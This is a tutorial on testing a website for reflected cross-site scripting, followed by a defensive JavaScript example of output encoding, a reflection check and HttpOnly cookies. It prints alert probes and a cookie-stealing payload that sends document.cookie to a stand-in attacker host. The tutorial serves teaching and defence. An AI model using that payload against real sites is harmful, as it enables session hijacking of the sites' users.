How to check your site for cross-site scripting vulnerabilities
Cross-site scripting (XSS) vulnerabilities date back to 1996, the early days of the World Wide Web. Over time, these types of attacks have evolved so much that they are one of the most critical vulnerabilities on the internet today. It is estimated that seven out of ten web applications are vulnerable to XSS attacks.
XSS is a type of injection problem that occurs mainly when data is included in dynamic content sent to a web browser without validation. Malicious content often takes the form of JavaScript, but can also include HTML, Flash, or any other type of code that the browser can execute.
Let's assume that the site http://victim.com/ is vulnerable to XSS. How do we check it? The basic method is to try injecting a JavaScript pop-up alert string through the URL:
http://victim.com/"><script> alert('XSS%20Testing')</script>
If the script inside the URL is not sanitised, this will trigger a pop-up alert (see figure).
At this point, an attacker may continue to modify the URL to include more sophisticated XSS payloads to exploit users.
Let's try a more advanced payload that can steal a user's cookies:
http://victim.com/"><script> var+img=new+img();img.src="http://attacker/"%20+%20document.cookie;</script>
The JavaScript code above creates an image DOM object (the var img statement). Since the JavaScript runs within the context of the vulnerable site's URL, the attacker has access to the cookie data. The image object's source is set to another domain, namely http://attacker.com/, with the browser's cookie string appended, and that is where the data is sent. The attacker can now place this URL in an email and send it to a user, who may click on the link and become a victim.
Another method of testing for XSS is to inject the test code into the search box provided on the victim website:
><script> alert('XSS%20Testing')</script>
If the website is vulnerable, this can also trigger a pop-up box.
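
The fix for the reflection tested above is to encode data on output and keep session cookies out of reach of scripts. The following is an added example, not code from the original post: a hypothetical search page rendered without and with output encoding, plus a check that the alert probe is no longer reflected intact. All function names, the markup and the cookie name are assumptions.

```javascript
// Added example: names and markup are hypothetical, not from the original post.

// Encode the five characters that let input break out of HTML text
// or out of a quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable form: the search term is concatenated into the page as-is.
function renderSearchUnsafe(query) {
  return '<input name="q" value="' + query + '"><p>Results for ' + query + "</p>";
}

// Hardened form: same template, every dynamic value is encoded on output.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return '<input name="q" value="' + q + '"><p>Results for ' + q + "</p>";
}

// Regression check: does the response echo the probe with its markup intact?
function reflectsRaw(html, probe) {
  return html.includes(probe);
}

// HttpOnly hides the cookie from document.cookie, so a script that does
// slip through cannot read the session identifier.
function sessionCookieHeader(sessionId) {
  return "sid=" + encodeURIComponent(sessionId) + "; Path=/; HttpOnly; Secure; SameSite=Lax";
}

// Constructed sample input: the alert probe from the post, URL-decoded.
const probe = "\"><script> alert('XSS Testing')</script>";

function demo() {
  return {
    unsafeReflectsProbe: reflectsRaw(renderSearchUnsafe(probe), probe),
    safeReflectsProbe: reflectsRaw(renderSearchSafe(probe), probe),
    safeHtml: renderSearchSafe(probe),
    cookie: sessionCookieHeader("constructed-session-id"),
  };
}

console.log(demo());
```

Running the check against every page that echoes user input, as part of the test suite, catches a template that regresses to raw concatenation.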
